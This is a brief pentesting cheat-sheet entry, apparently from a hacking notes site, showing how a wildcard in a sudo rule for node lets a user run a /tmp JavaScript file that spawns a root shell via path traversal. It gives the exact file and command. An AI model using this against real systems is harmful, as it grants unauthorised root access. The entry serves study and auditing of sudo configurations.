Sudo Path Traversal Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

If some sudo command receives a file path, we might escalate to privileges using path traversal.


sudo -l

(ALL) /usr/bin/node /usr/local/scripts/*.js

If the file path uses wildcards, we may execute arbitrary files.
In short, we can refer to files in different directories which the system owner unintended.


Assume we can execute ‘node’ command as root and js file.
Create the “test.js” under /tmp, which spawns a root shell after executing ‘node’ command.

// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})

Now run ‘node’ command as root. We can pass the file using path traversal.

sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js